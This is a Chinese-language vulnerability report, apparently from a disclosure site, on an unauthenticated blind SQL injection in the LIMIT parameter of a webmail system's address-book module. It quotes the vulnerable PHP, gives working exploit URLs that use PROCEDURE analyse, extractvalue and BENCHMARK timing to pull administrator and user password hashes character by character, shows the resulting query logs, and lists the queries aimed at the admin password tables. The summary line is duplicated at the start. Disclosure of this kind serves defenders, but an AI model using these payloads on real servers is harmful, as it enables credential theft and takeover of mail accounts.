### 简要描述: SQL Injections in MySQL LIMIT clause,过滤不严,产生盲注,导致可以注射用户名与密码,无需登录 ### 详细说明: 上次搜索只在client搜索,今天无意在fast目录下搜索了下,又发现了一处。 注:client的目录下的所有函数必须登录才可以执行,fast的目录无需登录可以执行部分存在的函数,但并不能查看邮件等等。 漏洞与上一个原理一样,但文件不同,此处访问权限设置不严格,可以任意用户访问,导致可以无需登录即可sql注入,limit无法使用sleep,用benchamark延时 漏洞文件/fast/oab/module/operates.php代码 ``` if ( ACTION == "member-get" ) { $dept_id = gss( $_GET['dept_id'] ); $keyword = gss( $_GET['keyword'] ); $page = $_GET['page'] ? gss( $_GET['page'] ) : 1; //limit $limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25;//用户可控的变量 $orderby = gss( $_GET['orderby'] ); $is_reverse = gss( $_GET['is_reverse'] ); $data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 ); $department_list = create_array( $data_cache, "dept_id", "name" ); $where = ""; if ( $dept_id && $dept_id != "-1" ) { $Tree = $Department->getTreeObject( ); $Tree->set_data_cache( $data_cache ); $Tree->sort_data( -1, 1 ); $dept_ids = $Tree->get_child_id( $dept_id ); $user_ids =...
### 简要描述: SQL Injections in MySQL LIMIT clause,过滤不严,产生盲注,导致可以注射用户名与密码,无需登录 ### 详细说明: 上次搜索只在client搜索,今天无意在fast目录下搜索了下,又发现了一处。 注:client的目录下的所有函数必须登录才可以执行,fast的目录无需登录可以执行部分存在的函数,但并不能查看邮件等等。 漏洞与上一个原理一样,但文件不同,此处访问权限设置不严格,可以任意用户访问,导致可以无需登录即可sql注入,limit无法使用sleep,用benchamark延时 漏洞文件/fast/oab/module/operates.php代码 ``` if ( ACTION == "member-get" ) { $dept_id = gss( $_GET['dept_id'] ); $keyword = gss( $_GET['keyword'] ); $page = $_GET['page'] ? gss( $_GET['page'] ) : 1; //limit $limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25;//用户可控的变量 $orderby = gss( $_GET['orderby'] ); $is_reverse = gss( $_GET['is_reverse'] ); $data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 ); $department_list = create_array( $data_cache, "dept_id", "name" ); $where = ""; if ( $dept_id && $dept_id != "-1" ) { $Tree = $Department->getTreeObject( ); $Tree->set_data_cache( $data_cache ); $Tree->sort_data( -1, 1 ); $dept_ids = $Tree->get_child_id( $dept_id ); $user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 ); $where = "t1.UserID IN (".$user_ids.")"; } if ( $keyword ) { if ( $where ) { $where .= " AND "; } if ( strpos( $keyword, "@" ) ) { $key_tmp = explode( "@", $keyword ); $keyword = $key_tmp[0]; } $where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")"; } switch ( $orderby ) { case "fullname" : $orderby = "t1.FullName"; break; case "mailbox" : $orderby = "t1.Mailbox"; break; case "sex" : $orderby = "t2.sex"; break; case "birthday" : $orderby = "t2.birthday"; break; case "mobile" : $orderby = "t2.mobil"; break; case "tel" : $orderby = "t2.teleextension"; break; case "position" : $orderby = "t2.headship"; break; case "group_num" : $orderby = "t2.o_group"; break; case "email" : $orderby = "t1.Mailbox"; break; $orderby = ""; } $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 );//进入了函数 ``` $limit可控,因而产生了注入,注入利用过程 首先向url post数据,(注,其实该接口并非是任意登录,执行后仅可以执行仅有的几个函数,所以如果执行了有sql缺陷的函数,则产生相应了相应的无需登录的sql注入问题,如可以update密保问题则产生了获得任意用户密码的缺陷,但可访问的函数有限,并不能查看用户邮件等等) [<img src="https://images.seebug.org/upload/201501/29230038f21fc95c78226b5d832527e7a11c828b.png" alt="a.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230038f21fc95c78226b5d832527e7a11c828b.png) 获得认证后,执行如下 http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1) 发现结果如下 [<img src="https://images.seebug.org/upload/201501/29230238fe9c08289774682e15a67af9e911e29f.png" alt="b.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230238fe9c08289774682e15a67af9e911e29f.png) 其执行的sql语句为 ``` 150128 21:44:43 3142 Connectumail@localhost on 3142 QuerySET NAMES 'UTF8' 3142 Init DBumail 3142 QuerySELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id` 3142 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 3142 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1) 3142 Quit ``` [<img src="https://images.seebug.org/upload/201501/29230313e8d13136347ed2ce45ef3cc7fe234411.png" alt="c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230313e8d13136347ed2ce45ef3cc7fe234411.png) 由于未执行错误回显,因而我们实施盲注,代码为 http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1) [<img src="https://images.seebug.org/upload/201501/292303527b109f03009696941b88e194e665eddd.png" alt="d.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/292303527b109f03009696941b88e194e665eddd.png) 其sql代码为 ``` 150128 21:47:16 3144 Connectumail@localhost on 3144 QuerySET NAMES 'UTF8' 3144 Init DBumail 3144 QuerySELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id` 3144 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 3144 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1) ``` 成功注入 因而可以通过脚本跑不同的用户帐号和密码,管理员的 #select+password+from+userlist+where+userid=2 system用户 #select+password+from+web_usr+where+usr_code=1 administrator用户 #select+password+from+web_usr+where+usr_code=2 admin用户 普通用户的话遍历userid获取username password即可。 附盲注脚本(脚本写的一半,未用二分法等,将就用) 本地测试 [<img src="https://images.seebug.org/upload/201501/29230727a14da43a2b26191fe2f8e922b37e19d6.jpg" alt="j.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230727a14da43a2b26191fe2f8e922b37e19d6.jpg) 以及官网管理登录截图 [<img src="https://images.seebug.org/upload/201501/292306185e3895e8f00d96837327be0189a39a2e.png" alt="e.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/292306185e3895e8f00d96837327be0189a39a2e.png) [<img src="https://images.seebug.org/upload/201501/29230625aa82c0dbe2cf6da5f51296caadc7a140.png" alt="f.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29230625aa82c0dbe2cf6da5f51296caadc7a140.png) ### 漏洞证明: 如上
